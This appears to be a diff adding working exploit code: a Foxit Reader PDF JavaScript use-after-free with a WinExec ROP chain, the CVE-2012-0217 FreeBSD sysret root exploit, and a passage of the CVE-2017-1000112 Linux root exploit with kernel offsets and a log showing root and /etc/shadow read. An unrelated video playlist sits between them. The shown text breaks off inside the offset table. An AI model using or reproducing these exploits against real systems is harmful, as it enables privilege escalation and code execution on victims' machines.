+2 0 obj
+<</S /JavaScript /JS (
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+
+function gc() {
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    var a = this.addAnnot({type: "Text"});
+
+    a.destroy();
+    gc();
+
+    prepare_heap(0x400);
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    var leaked = stolen[0] & 0xffff0000;
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    var a = this.addAnnot({type: "Text"});
+    a.destroy();
+    prepare_heap(0x400);
+
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    alloc_at_leak();
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        <%= rop %>
+        rop[0x17] = 0x00000000;              // adios, amigo
+    }
+}
+
+function trigger_uaf(){
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{
+            get: function () {
+
+                that.getAnnot(0, "uaf").destroy();
+
+                reclaim();
+                return 1;
+            }
+        }
+    });
+
+    a.point = arr;
+}
+
+function main(){
+    leak_heap_chunk();
+    leak_vtable();
+    control_memory();
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>
@@ -0,0 +1,15 @@
+#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-TARGETDURATION:4
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:3.433333,
+epicsax0.ts
+#EXTINF:1.700000,
+epicsax1.ts
+#EXTINF:1.700000,
+epicsax2.ts
+#EXTINF:1.700000,
+epicsax3.ts
+#EXTINF:1.466667,
+epicsax4.ts
+#EXT-X-ENDLIST
@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -0,0 +1,884 @@
+// A proof-of-concept local root exploit for CVE-2017-1000112.
+// Includes KASLR and SMEP bypasses. No SMAP bypass.
+// Tested on:
+// - Ubuntu trusty 4.4.0 kernels
+// - Ubuntu xenial 4.4.0 and 4.8.0 kernels
+// - Linux Mint rosa 4.4.0 kernels
+// - Linux Mint sarah 4.8.0 kernels
+// - Zorin OS 12.1 4.4.0-39 kernel
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+// user@ubuntu:~$ whoami
+// user
+// user@ubuntu:~$ id
+// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn 
+// [.] starting
+// [.] checking kernel version
+// [.] kernel version '4.8.0-58-generic' detected
+// [~] done, version looks good
+// [.] checking SMEP and SMAP
+// [~] done, looks good
+// [.] setting up namespace sandbox
+// [~] done, namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [~] done, kernel text:   ffffffffae400000
+// [.] commit_creds:        ffffffffae4a5d20
+// [.] prepare_kernel_cred: ffffffffae4a6110
+// [.] SMEP bypass enabled, mmapping fake stack
+// [~] done, fake stack mmapped
+// [.] executing payload ffffffffae40008d
+// [~] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# whoami
+// root
+// root@ubuntu:/home/user# id
+// uid=0(root) gid=0(root) groups=0(root)
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// sys:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+// ---
+// Updated by <bcoles@gmail.com>
+// - support for distros based on Ubuntu kernel
+// - additional kernel targets
+// - additional KASLR bypasses
+// https://github.com/bcoles/kernel-exploits/tree/cve-2017-1000112
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <sched.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <linux/socket.h>
+#include <netinet/ip.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#	define dprintf printf
+#else
+#	define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS		1
+#define ENABLE_SMEP_BYPASS		1
+
+char* SHELL = "/bin/bash";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
+unsigned long KERNEL_BASE =		0xffffffff81000000ul;
+
+// Will be overwritten by detect_kernel().
+int kernel = -1;
+
+struct kernel_info {
+	const char* distro;
+	const char* version;
+	uint64_t commit_creds;
+	uint64_t prepare_kernel_cred;
+	uint64_t xchg_eax_esp_ret;
+	uint64_t pop_rdi_ret;
+	uint64_t mov_dword_ptr_rdi_eax_ret;
+	uint64_t mov_rax_cr4_ret;
+	uint64_t neg_rax_ret;
+	uint64_t pop_rcx_ret;
+	uint64_t or_rax_rcx_ret;
+	uint64_t xchg_eax_edi_ret;
+	uint64_t mov_cr4_rdi_ret;
+	uint64_t jmp_rcx;
+};
+
+struct kernel_info kernels[] = {
+	{ "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
+	{ "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
+	{ "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
+	{ "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
+	{ "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
+	{ "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
+	{ "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
+	{ "trusty", "4.4.0-87-generic", 0x9ec20, 0x9ef00, 0x8a, 0x253b93, 0x109a17, 0x1a840, 0x3e7cda, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
+	{ "trusty", "4.4.0-89-generic", 0x9ec30, 0x9ef10, 0x8a, 0x3ec5cF, 0x109a27, 0x1a830, 0x3e7fba, 0x1cc7c, 0x77523, 0x49d1d, 0x62360, 0x1a77b },
+	{ "xenial", "4.4.0-81-generic", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },
+	{ "xenial", "4.4.0-89-generic", 0xa28a0, 0xa2c90, 0x8a, 0x33e60d, 0x112777, 0x1b9b0, 0x403a1a, 0x1de5c, 0x7a483, 0x1084e5, 0x645b0, 0x3083d },
+	{ "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
+	{ "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
+	{ "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	// { "xenial", "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x4149ad, 0x1191f7, 0x1b170, 0x439d7a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df1b },
+	// { "xenial", "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df17 },
+	{ "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-51-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
